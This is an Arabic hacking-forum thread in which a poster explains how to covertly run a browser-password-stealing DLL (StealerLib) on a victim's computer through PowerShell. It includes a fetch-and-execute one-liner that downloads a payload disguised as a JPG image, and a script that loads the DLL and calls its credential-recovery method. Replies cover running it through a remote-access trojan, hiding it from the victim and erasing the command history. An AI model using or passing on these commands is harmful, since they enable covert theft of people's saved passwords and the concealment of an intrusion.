تشغيل مكتبة ستيلر ليب عن بعد من خلال الباور شيل

[BasharBachir]

حياكم الله ..
شفت رد الاخ هنا
DBStealer| سحب الباس وردات وارسالها للداتا بيس وقراءتها من خلال اداة .

هل ممكن عمل متل هده الادات لكن بالبور شل يعني ملف بور شل يجلب المعلومات

الفائدة اللي يريدها اعتقد انه يريد يشغل باور شيل بخفاء بجهاز المستخدم ويحصل على الاوت بوت ..
يعني مستخدم عنده جاهز ويريد يشغل المكتبة ..
هنا الحل ..
اول واسهل حل والافضل ..حمل الصورة من الرابط هنا

https://2.top4top.net/p_1320tzmwe1.jpg

ارفعها على اي رابط مباشر او اي موقع لرفع الصور مايقوم بتحويلها او التعديل عليها ..
محتوى الملف هنا

لعرض المحتوى , تحتاج إلى تسجيل الدخول أو إنشاء حساب.لعرض المحتوى , تحتاج إلى تسجيل الدخول أو إنشاء حساب.

بالملف موجود بايتات المكتبة كاملة ولكن وضعت هنا فقط 77,90,144,0
المهم بعد ماتحمل الصورة نفذ بالجهاز الهدف الامر التالي

IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.101/img.jpg');

استبدل الرابط اللي بالكود برابط الصورة اللي وضعت رابطها يعني حمل الصورة ومن ثم ارفعها مرة ثانية ..
هذا كل شيء ..

الطريقة الثانية لو المكتبة لها مسار بجهاز المستخدم يعني مابدك الامور تتم عن بعد مثل الطريقة الاولى ..

قم بكتابة الكود التالي مع مراعاة مسار المكتبة اللي ارفقتها بالملف "يعني المكتبة لازمة فقط في الطريقة الثانية"

$Path      = "D:\StealerLib.dll"
$Namespace = "StealerLib.Browsers"
$ClassName = "CaptureBrowsers"
$Method    = "RecoverCredential"
$Arguments = $null
Add-Type -Path $Path
$Full_Class_Name = "$Namespace.$ClassName"
$Type            = [type] $Full_Class_Name
$MethodInfo = $Type.GetMethod($Method)
$MethodInfo.Invoke($null, $Arguments)

للتحميل من هنا

لعرض المحتوى , تحتاج إلى تسجيل الدخول أو إنشاء حساب.
هنا فديو على السريع ..بريء امام الله عز وجل من اي استخدام في معصية .

​

 

[Frsibm]

اين تدخل النتائج اخي بشار

 

[BasharBachir]

اين تدخل النتائج اخي بشار

مافهمت سؤالك للاسف اخي الحبيب ..
التائج تظهر لك بواجههة الباور شيل اللي مشغلها بشكل مخفي بجهاز المستخدم عن طريق المتحكم الخاص بك ..
بس يطلعو بتنسخهم ..او بامكانك جعل الناتج في ملف text يتم كتابته ..بس الافضل انك تاخذهم مباشرة من الاوت بوت الخاص بالباور شيل عند تنفيذ الامر المذكور سابقا

 

[Frsibm]

مثلا اخي بشار انا اخترقتك في رات معين ثم شغلت امر مكتبة Stealer عندك بالباور شل وهي مخفية عندك كيف استطيع الحصول على الباسووردات يعني ان ظهرت لي ستظهر له ايضا

 

[Frsibm]

يعني احول المكتبة الى بايتات بعدها اضعها في كود الباور شل واحفضها كصورة ثم نرسل للضحية امر التشفيل بالباورشل

 

[BasharBachir]

مثلا اخي بشار انا اخترقتك في رات معين ثم شغلت امر مكتبة Stealer عندك بالباور شل وهي مخفية عندك كيف استطيع الحصول على الباسووردات يعني ان ظهرت لي ستظهر له ايضا

لا لن تظهر له ابدا ..لان الباور شيل شغالة عنده بالخفاء
وعشان لو حب يشوف اخر الاوامر اللي تمت كتابتها ابحث بجوجل في امر لحذف السجل الخاص بالاوامر المطبقة بالباور شيل

يعني احول المكتبة الى بايتات بعدها اضعها في كود الباور شل واحفضها كصورة ثم نرسل للضحية امر التشفيل بالباورشل

لاتحول شي اخي الحبيب بالصورة اللي ارفقت لكم رابطها موجود البايتات كاملة فقط ضع الرابط المباشر الجديد للصورة بعد ان تقوم بتحميلها ورفعها وقم بتنفيذ الامر

 

[Frsibm]

لا اعلم اخي انا لم افهم طريقة العمل اساسا طبقت السكريبت بالباور شل عن طريق الريفنج رات لم يظهر شيئ لا لي ولا للضحية

 

[BasharBachir]

لا اعلم اخي انا لم افهم طريقة العمل اساسا طبقت السكريبت بالباور شل عن طريق الريفنج رات لم يظهر شيئ لا لي ولا للضحية

 

[Frsibm]

ماذا سأقول أخي بشار بارك الله فيك

 

[solo]

الله يجزيك كل خير اخي بشار BOUCOUP MERCI

 

[annaba23]

جربت هده الطريقة الاولى والتانية مع وندوز 7 ما اشتغلت كلا الطريقتين تعطي خطأ الطريقة التانية هدا هو الخطا ليظهر رغم وجود الملف دلل في القرص إلا انها تقول غير موجود هل حد تاني جرب ونجحت

 

[Absolute Zero]

شكرا لك اخي بشار كنت اواجه مشكلة في تحويل هذه المكتبة لبلوقن في الرات الخاص بي و طريقتك الهمتني لحل بدون تحويل الكلاينت ل framwork v 4

 

[BasharBachir]

جربت هده الطريقة الاولى والتانية مع وندوز 7 ما اشتغلت كلا الطريقتين تعطي خطأ الطريقة التانية هدا هو الخطا ليظهر رغم وجود الملف دلل في القرص إلا انها تقول غير موجود هل حد تاني جرب ونجحت

اهلا بك اخي الحبيب ..يلزم توافر فريم وورك 4.5 في الجهاز "مش بايدي" المكتبة الجاهزة StealerLib تستخدم مكتبة SQL والي بدورها موجودة في الفريم ورك 4.5
تاكد من ان الفريم وورك ذا متواجد ورح تشتغل اكيد .

 

[annaba23]

ممكن ارفاق سورس كود المكتبة المحولة اخي بشار انا لا املك طريقة لتحويلها لاني ليس لدي جهاز يشغل المكتبة الأصلية شكرا على كل حال دروسك ما شاء الله نحن تنعلم منك كل يوم كدلك كنت اود ان أسألك عن موضوع اعجبني موجود في الديف بونت وهو رات مبرمج للعمل بالبور شال يعني الكلانيت فزوال بزيك والسرفر بور شل هل يمكن ان يكون السرفر مستقر ام ان الطريقة غير فعالة حسب رأيك لان جربت لكن السرفر لا يعمل بطريقة جيدة لا اعلم المشكل اين هل التتبيت ام التبليغ بطيئ المهم لو تفتح موضوع للنقاش وعمل رات بهده المواصفات راح يكون شيئ جديد كليا يعني ممكن تنفيد اوامر الشل مباشرة

 

[BasharBachir]

ممكن ارفاق سورس كود المكتبة المحولة اخي بشار انا لا املك طريقة لتحويلها لاني ليس لدي جهاز يشغل المكتبة الأصلية شكرا على كل حال دروسك ما شاء الله نحن تنعلم منك كل يوم كدلك كنت اود ان أسألك عن موضوع اعجبني موجود في الديف بونت وهو رات مبرمج للعمل بالبور شال يعني الكلانيت فزوال بزيك والسرفر بور شل هل يمكن ان يكون السرفر مستقر ام ان الطريقة غير فعالة حسب رأيك لان جربت لكن السرفر لا يعمل بطريقة جيدة لا اعلم المشكل اين هل التتبيت ام التبليغ بطيئ المهم لو تفتح موضوع للنقاش وعمل رات بهده المواصفات راح يكون شيئ جديد كليا يعني ممكن تنفيد اوامر الشل مباشرة

مافهمت سالفة "تحويلها" تقصد جعلها تعمل على 2.0 فريم وورك ؟

هنا موضوع قمت بذلك اخي

مكتبة StealerLib تعمل على فريم ورك 2.0

عشان السورس فقط اسحب المكتبة على Dnspy بيطلع السورس معاك
لو صار مشكلة خبرني

 

[FBA]

test

 

[FBA]

test replay